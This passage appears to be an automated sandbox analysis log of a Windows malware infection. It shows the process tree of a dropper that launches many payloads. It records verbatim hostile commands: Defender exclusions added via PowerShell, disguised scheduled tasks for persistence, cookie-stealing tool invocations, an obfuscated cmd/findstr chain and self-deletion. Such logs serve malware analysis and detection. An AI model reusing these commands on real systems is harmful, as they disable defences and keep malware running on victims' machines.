    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3556
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7912
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:6888
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6968
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7088
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6844
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7212
- - C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:5792
  - - C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe" /SpecialRun 4101d8 5792
      4⤵
      PID:6244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7844
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7108
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:4604
- C:\Users\Admin\AppData\Roaming\jwtwjbt
  C:\Users\Admin\AppData\Roaming\jwtwjbt
  2⤵
  - Suspicious use of SetThreadContext
  PID:4896
- - C:\Users\Admin\AppData\Roaming\jwtwjbt
    C:\Users\Admin\AppData\Roaming\jwtwjbt
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:3800
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll",NXfSHgjpzLhX
  2⤵
  - Windows security modification
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:7012
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  PID:3684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:568
- C:\Users\Admin\AppData\Local\Temp\is-RHJDS.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-RHJDS.tmp\Install.tmp" /SL5="$301DA,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Users\Admin\AppData\Local\Temp\is-HU5RM.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-HU5RM.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Program Files\Common Files\RORKYZRGJV\ultramediaburner.exe
      "C:\Program Files\Common Files\RORKYZRGJV\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Users\Admin\AppData\Local\Temp\is-JVNE8.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JVNE8.tmp\ultramediaburner.tmp" /SL5="$7002E,281924,62464,C:\Program Files\Common Files\RORKYZRGJV\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1580
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\88-c5761-930-4dca5-d794f5fc5bd78\Lulevugodu.exe
      "C:\Users\Admin\AppData\Local\Temp\88-c5761-930-4dca5-d794f5fc5bd78\Lulevugodu.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of AdjustPrivilegeToken
      PID:4052
  - - C:\Users\Admin\AppData\Local\Temp\7c-cb544-0bf-48597-f1b23c079e308\SHyqaefepynae.exe
      "C:\Users\Admin\AppData\Local\Temp\7c-cb544-0bf-48597-f1b23c079e308\SHyqaefepynae.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snvkmbwt.u4w\KiffMainE1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3792
      - C:\Users\Admin\AppData\Local\Temp\snvkmbwt.u4w\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\snvkmbwt.u4w\KiffMainE1.exe
        6⤵
        
        PID:4256
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gsbjint.gkv\001.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4204
      - C:\Users\Admin\AppData\Local\Temp\5gsbjint.gkv\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\5gsbjint.gkv\001.exe
        6⤵
        Executes dropped EXE
        
        PID:4496
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5de4e2gi.24h\download.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4404
      - C:\Users\Admin\AppData\Local\Temp\5de4e2gi.24h\download.exe
        
        C:\Users\Admin\AppData\Local\Temp\5de4e2gi.24h\download.exe
        6⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:5048
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 5048 & erase C:\Users\Admin\AppData\Local\Temp\svchost.exe & RD /S /Q C:\\ProgramData\\452689150367893\\* & exit
        8⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 5048
        9⤵
        Kills process with taskkill
        
        PID:4668
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4456
      - C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe /qn CAMPAIGN="654"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4644
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619983798 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:5636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ieywgiyd.rrs\gpooe.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4920
      - C:\Users\Admin\AppData\Local\Temp\ieywgiyd.rrs\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\ieywgiyd.rrs\gpooe.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:2932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\suqvcyje.ede\google-game.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4756
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4600
      - C:\Users\Admin\AppData\Local\Temp\suqvcyje.ede\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\suqvcyje.ede\google-game.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2196
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        7⤵
        Loads dropped DLL
        
        PID:2432
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycofe4e5.kjk\jg8_mysu.exe & exit
        5⤵
        
        PID:4740
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
      - C:\Users\Admin\AppData\Local\Temp\ycofe4e5.kjk\jg8_mysu.exe
        
        C:\Users\Admin\AppData\Local\Temp\ycofe4e5.kjk\jg8_mysu.exe
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:5248
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\raorbemu.asg\huesaa.exe & exit
        5⤵
        
        PID:5316
      - C:\Users\Admin\AppData\Local\Temp\raorbemu.asg\huesaa.exe
        
        C:\Users\Admin\AppData\Local\Temp\raorbemu.asg\huesaa.exe
        6⤵
        Executes dropped EXE
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:6524
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:3204
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe & exit
        5⤵
        
        PID:5512
      - C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe
        6⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\bdu0ke1q.on1\setup.exe"
        7⤵
        
        PID:972
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        8⤵
        Runs ping.exe
        
        PID:5508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wyv34fd3.vjz\askinstall39.exe & exit
        5⤵
        
        PID:6040
      - C:\Users\Admin\AppData\Local\Temp\wyv34fd3.vjz\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\wyv34fd3.vjz\askinstall39.exe
        6⤵
        Executes dropped EXE
        
        PID:5220
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:4808
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0jjyiiw.eja\Setup_v3.exe & exit
        5⤵
        
        PID:5672
      - C:\Users\Admin\AppData\Local\Temp\g0jjyiiw.eja\Setup_v3.exe
        
        C:\Users\Admin\AppData\Local\Temp\g0jjyiiw.eja\Setup_v3.exe
        6⤵
        Executes dropped EXE
        
        PID:5892
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        7⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
        7⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        8⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
        9⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
        
        Fessura.exe.com Z
        9⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:5300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
        11⤵
        Creates scheduled task(s)
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
        11⤵
        Executes dropped EXE
        
        PID:6176
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 30
        9⤵
        Runs ping.exe
        
        PID:5784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe & exit
        5⤵
        
        PID:4880
      - C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\gy4h1stm.wdm\y1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5492
        
